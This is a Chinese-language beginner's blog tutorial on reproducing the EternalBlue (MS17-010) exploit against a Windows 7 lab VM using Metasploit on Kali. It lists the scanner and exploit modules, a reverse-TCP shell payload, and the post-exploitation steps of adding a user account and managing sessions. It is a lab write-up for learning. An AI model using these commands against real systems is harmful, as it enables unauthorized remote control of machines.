kali上使用msf渗透win7(永恒之蓝操作复现)初学者指南

首先开篇先放出我使用的kali 与 win7 的网盘链接:

链接: https://pan.baidu.com/s/1tvrj41wLRY4ZTfJG8mDwVA?pwd=v6e4

提取码: v6e4

大家VMware上新建虚拟机即可~

简单介绍一个Metasploit,一个免费的、开源的渗透测试框架,kali上可以直接使用~

1. Metasploit初始化

在使用之前我们需要对Metasploit进行初始化,并启动:

终端窗口的命令行输入如下命令

systemctl start postgresql
systemctl enable postgresql

启动专用的数据库,并设置为每次开机自动启动

msfconsole

或者 点击kali屏幕左上角图标->选择 08->点击Metasploit framework

(P.S. msf == Metasploit framework

2. Metasploit常用命令

search 
  • 按关键字查找
use
  • 选择对应模块并使用
    (P.S. <1>在use 中想退出模块不退出框架使用 back命令;<2> 也可以使用info 查看使用模块的详细信息
show options
  • 查看该模块需要配置的参数
run
  • 运行模块

事实上,msf的使用法则三步走

  1. 查找对应可使用模块;
  2. 使用模块并配置模块必选项;
  3. 运行模块。

msf中共有6大模块,分别是:

  1. 渗透攻击模块Exploit Modules:攻击漏洞
  2. 辅助模块Auxiliary Modules:扫描
  3. 攻击载荷Payload Modules:载荷,一段指令(shellcode),目标系统在被渗透攻击之后去执行的代码
  4. 空字段模块Nop Modules
  5. 编码模块Encoders
  6. 后渗透攻击模块Post:攻击成功之后,动态传输代码使其在被控机执行

在本次实验中,我们主要使用123.

3.永恒之蓝复现过程

3.1准备工作
首先确定两台虚拟机kali与win7在同一网段内,同时win7防火墙已关闭
P.S.kali 使用 ifconfig 查看 ip,win7 使用 ipconfig 查看ip

  • 其中我的win7 ip 为 192.168.31.73

P.S.win7防火墙关闭:

  1. 选择左下角“开始”图标,
  2. 点击“控制面板”,
  3. 选择“系统与安全”,
  4. 点击“windows防火墙”,
  5. 左列选择“打开或关闭防火墙”

3.2扫描是否有可用漏洞

P.S.永恒之蓝(MS17_010)

search ms17_010

先搜索查找可用模块
在这里插入图片描述

use auxiliary/scanner/smb/smb_ms17_010

use 调用Aux扫描模块(借此查看目标主机是否有漏洞
在这里插入图片描述

show options

使用该命令查看需要配置的参数,Required == yes 且 Current Setting 为空的值是我们需要配置。
在这里插入图片描述

set rhost 192.168.31.73

设置上文所需的rhost参数
在这里插入图片描述

run

出现+号表示可以入侵
在这里插入图片描述

3.3渗透

use exploit/windows/smb/ms17_010_eternalblue
show options
set 192.168.31.73

P.S.和扫描有异曲同工之处

use 调用Exploits模块(该模块也是search中搜索出的),并查看需配置的参数,并设置参数
在这里插入图片描述

在这里插入图片描述

show payloads 
set payload windows/x64/shell/reverse_tcp
run

查看可使用的攻击载荷并设置,最后运行该模块
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里可以看见我们拿到win7的shell的,但是会出现乱码,解决乱码的情况

chcp 65001

在这里插入图片描述
3.4测试

在kali上干一些对win7有影响的事吧!比如在这里我是添加了一个faker用户
在这里插入图片描述
回到win7发现确定增加了该用户~

3.5保存该次进程于后台,并再次打开

background

进程放至后台

sessions -l

展示后台进程

sessions -i 2

再次打开该进程
在这里插入图片描述

  • 13
    点赞
  • 114
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
永恒之蓝是指微软Windows操作系统中的一个漏洞,也被称为ms17-010漏洞。通过利用永恒之蓝漏洞,黑客可以在目标机器上执行远程代码,获得对系统的控制权。在Kali Linux中,可以使用一些工具来进行永恒之蓝漏洞的渗透测试。 首先,使用auxiliary/scanner/smb/smb_ms17_010模块进行扫描目标主机,以确定是否存在漏洞。如果扫描结果显示存在漏洞,可以进一步使用exploit/windows/smb/ms17_010_eternalblue模块进行渗透。这个模块可以利用永恒之蓝漏洞远程执行代码,获取目标主机的shell。 在Kali Linux中,可以使用search命令来搜索有关永恒之蓝漏洞的可利用部分。具体来说,可以使用search ms17-010命令来搜索与ms17-010漏洞相关的可利用模块或脚本。 需要注意的是,在进行任何渗透测试之前,请确保您已获得合法的授权,并且仅在合法范围内使用这些工具和技术。任何未经授权的渗透测试活动都是非法的。 总结起来,Kali Linux中可以使用smb_ms17_010和ms17_010_eternalblue工具来扫描和渗透永恒之蓝漏洞。使用search命令可以搜索与该漏洞相关的可利用部分。在进行任何渗透测试之前,请确保遵守法律法规并获得合法授权。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [通过Kali利用永恒之蓝漏洞目标主机shell,并进行部分后渗透操作](https://blog.csdn.net/weixin_60182338/article/details/129622710)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* [网络安全实战(三)Kali Linux渗透测试(永恒之蓝 MS17-010漏洞复现)](https://blog.csdn.net/weixin_42474227/article/details/122237494)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值